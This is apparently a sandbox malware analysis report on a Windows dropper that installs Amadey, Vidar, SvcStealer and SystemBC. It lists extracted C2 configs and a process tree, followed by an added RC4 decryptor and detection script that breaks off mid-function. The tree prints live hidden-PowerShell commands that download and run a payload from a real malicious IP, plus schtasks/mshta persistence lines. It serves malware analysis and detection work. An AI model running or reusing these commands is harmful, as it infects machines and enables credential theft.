Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    05/03/2025, 03:56

General

  • Target

    e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe

  • Size

    938KB

  • MD5

    ef59bfc4e53fa990607868d76f1a9a93

  • SHA1

    07a2dff253bc24e4683898621cd5a9c01af59ea3

  • SHA256

    e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35

  • SHA512

    31fc8c697e3eedc23c2251b95b34fd24f5d58d9dab5cdb9197d7890497c3aad430f15bf4a02d9c6bf39fdf473a1fd49b40700e36951ba6ee18523374191d1664

  • SSDEEP

    24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8a0xu:VTvC/MTQYxsWR7a0x

Malware Config

Extracted

Language
ps1
Deobfuscated URLs
exe.dropper

http://176.113.115.7/mine/random.exe

(This PowerShell downloader was extracted three times, once from each of the three mshta-launched powershell.exe processes in the tree below; all three fetch the same URL.)

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain
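The Amadey entry above labels its strings_key as rc4.plain, meaning the 32-character key is used literally as the RC4 key for the bot's encrypted string table. The Python below is an added example, not part of the Triage report or of the malware: it implements RC4 and shows how such a key is applied to a string blob. The hex encoding of the blobs and the sample blob itself are assumptions constructed here (the blob is produced by encrypting the config's own url_path under the extracted key), not ciphertext recovered from the sample.

```python
"""RC4 decryptor for a config whose strings_key is marked rc4.plain.

Added example. The key is the one from the Amadey config above; the sample
blob is constructed here by encrypting known text with that key.
"""
from typing import Iterator

# strings_key extracted by the sandbox; "rc4.plain" = used as the literal RC4 key.
STRINGS_KEY = b"a131b127e996a898cd19ffb2d92e481b"


def rc4_keystream(key: bytes) -> Iterator[int]:
    """Yield RC4 keystream bytes for `key` (KSA followed by PRGA)."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:                                # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric: the same call encrypts and decrypts."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def decrypt_hex_blob(key: bytes, hex_blob: str) -> str:
    """Decode a hex-encoded RC4 blob to text (hex storage is an assumption here)."""
    return rc4(key, bytes.fromhex(hex_blob)).decode("latin-1")


def encrypt_to_hex_blob(key: bytes, text: str) -> str:
    """Inverse of decrypt_hex_blob; used only to build demonstration data."""
    return rc4(key, text.encode("latin-1")).hex()


# Constructed sample: the config's url_path encrypted under the extracted key.
SAMPLE_PLAINTEXT = "/Ni9kiput/index.php"
SAMPLE_BLOB = encrypt_to_hex_blob(STRINGS_KEY, SAMPLE_PLAINTEXT)


if __name__ == "__main__":
    print("blob:     ", SAMPLE_BLOB)
    print("decrypted:", decrypt_hex_blob(STRINGS_KEY, SAMPLE_BLOB))
```

When taking the sample apart by hand, run decrypt_hex_blob over each encrypted string in the binary; the install_dir, install_file and url_paths values listed above are the kind of strings that come out. The implementation is checked against the standard RC4 test vector (key "Key", plaintext "Plaintext") so a wrong swap in the KSA or PRGA would show up immediately.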

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

systembc

C2

towerbingobongoboom.com

62.60.226.86

Attributes
  • dns

    5.132.191.104

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 7 IoCs
  • Detects SvcStealer Payload 5 IoCs

    SvcStealer aka Diamotrix Clipper is a stealer/downloader written in C++.

  • SvcStealer, Diamotrix

    SvcStealer aka Diamotrix Clipper is a stealer/downloader written in C++.

  • Svcstealer family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer. The t.me and steamcommunity.com URLs in its config are dead-drop resolvers: the stealer reads its real C2 address from those public profiles instead of carrying it hard-coded.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    PowerShell is run with its console window hidden (-WindowStyle Hidden).

  • Downloads MZ/PE file 16 IoCs
  • .NET Reactor protector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 27 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 63 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 5 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 42 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1208
    • C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe
      "C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2988
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3004
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2068
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:2064
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1864
          • C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
            "C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:2780
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1936
              • C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
                "C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2936
                • C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
                  "C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Modifies system certificate store
                  PID:2460
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 500
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:1776
              • C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
                "C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2196
              • C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
                "C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2296
                • C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe
                  "C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe" -burn.filehandle.attached=216 -burn.filehandle.self=212
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2652
                  • C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
                    C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
                    9⤵
                    • Executes dropped EXE
                    PID:1864
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 208
                    9⤵
                    • Loads dropped DLL
                    • Program crash
                    PID:2676
              • C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
                "C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1952
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 1200
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:1352
              • C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
                "C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1688
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 1036
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:2252
              • C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe
                "C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                PID:2648
                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1580
              • C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe
                "C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"
                7⤵
                • Executes dropped EXE
                PID:2808
              • C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe
                "C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2824
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 1216
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:1328
              • C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe
                "C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe"
                7⤵
                • Executes dropped EXE
                PID:2800
              • C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
                "C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"
                7⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                PID:880
              • C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
                "C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2336
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 852
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:1856
              • C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
                "C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                PID:2364
                • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                  "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                  8⤵
                  • Downloads MZ/PE file
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:2300
                  • C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
                    "C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2372
              • C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
                "C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1824
              • C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
                "C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                PID:2268
                • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                  "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Modifies system certificate store
                  PID:792
              • C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe
                "C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:2212
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c schtasks /create /tn zlcjtmaYQKF /tr "mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1976
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /tn zlcjtmaYQKF /tr "mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta" /sc minute /mo 25 /ru "Admin" /f
                    9⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:904
                • C:\Windows\SysWOW64\mshta.exe
                  mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Modifies Internet Explorer settings
                  PID:3016
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                    9⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Downloads MZ/PE file
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2348
                    • C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE
                      "C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE"
                      10⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1696
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd" "
                7⤵
                • System Location Discovery: System Language Discovery
                PID:920
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 2
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Delays execution with timeout.exe
                  PID:956
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:884
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1384
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2596
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2780
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2340
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:872
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "O5x0ImaVemy" /tr "mshta \"C:\Temp\8dw7RzrvO.hta\"" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1944
                • C:\Windows\SysWOW64\mshta.exe
                  mshta "C:\Temp\8dw7RzrvO.hta"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Modifies Internet Explorer settings
                  PID:2712
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                    9⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Downloads MZ/PE file
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1584
                    • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                      "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                      10⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      PID:2800
              • C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe
                "C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:848
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {0102F77C-CFAE-4625-AABC-402260BBCF85} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]
    1⤵
      PID:2924
      • C:\ProgramData\djrq\nbiciq.exe
        C:\ProgramData\djrq\nbiciq.exe
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:544
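As an added example (not part of the Triage report), the Python below replays process-creation records transcribed from the tree above through two detection rules a SOC would want for this chain: a schtasks /create whose action runs mshta on an .hta in a user-writable path, and a powershell.exe with a hidden window that calls WebClient.DownloadFile and Start-Process, correlated to an mshta parent. It also reproduces the downloader's path arithmetic: $env:temp+'NAME' has no separator, so the first two payloads land in %LOCALAPPDATA% as Temp<NAME>.EXE, exactly where the tree shows them, while the third variant includes the backslash. The record layout, the TEMP_DIR constant and the rule names are assumptions of this example.

```python
"""Detection logic for the schtasks -> mshta -> hidden PowerShell downloader chain.

Added example, not part of the report. Replays process-creation records
transcribed from the tree above and flags the two behaviours that matter.
"""
import re
from dataclasses import dataclass

# %TEMP% of the sandbox user as shown in the report (assumed; used only for drop-path prediction).
TEMP_DIR = r"C:\Users\Admin\AppData\Local\Temp"


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# Records transcribed from the process tree (PIDs, images and command lines are the
# report's; the record layout is constructed for this example).
EVENTS = [
    ProcEvent(3004, 2988, r"C:\Windows\SysWOW64\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f'),
    ProcEvent(2068, 3004, r"C:\Windows\SysWOW64\schtasks.exe",
              r'schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f'),
    ProcEvent(2064, 2988, r"C:\Windows\SysWOW64\mshta.exe",
              r"mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta"),
    ProcEvent(1864, 2064, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;'''),
    ProcEvent(1944, 920, r"C:\Windows\SysWOW64\schtasks.exe",
              r'schtasks /create /tn "O5x0ImaVemy" /tr "mshta \"C:\Temp\8dw7RzrvO.hta\"" /sc minute /mo 25 /ru "Admin" /f'),
    ProcEvent(2712, 920, r"C:\Windows\SysWOW64\mshta.exe", r'mshta "C:\Temp\8dw7RzrvO.hta"'),
    ProcEvent(1584, 2712, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;'''),
    # PowerShell used by am_no.cmd only to generate a random name; must not be flagged.
    ProcEvent(1384, 884, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"'),
]

# PowerShell accepts unambiguous parameter prefixes, so "-w hidden" and "-win h" must match too.
RE_HIDDEN = re.compile(r"-w[a-z]*\s+h[a-z]*", re.I)
RE_DOWNLOADFILE = re.compile(r"DownloadFile\(\s*'([^']+)'", re.I)
RE_ENV_TEMP_CONCAT = re.compile(r"\$env:temp\s*\+\s*'([^']+)'", re.I)
RE_TASK_ACTION = re.compile(r'/tr\s+"(.*?)"\s+/sc\b', re.I)
RE_USER_WRITABLE = re.compile(r"\\(users|temp|appdata)\\", re.I)


def predicted_drop_path(cmdline: str):
    """Mirror PowerShell's plain string concatenation: without a leading backslash in the
    literal, $env:temp+'NAME' yields ...\Local\TempNAME, i.e. a file beside the Temp folder."""
    m = RE_ENV_TEMP_CONCAT.search(cmdline)
    return TEMP_DIR + m.group(1) if m else None


def analyze(events):
    """Return one finding dict per event that matches either rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
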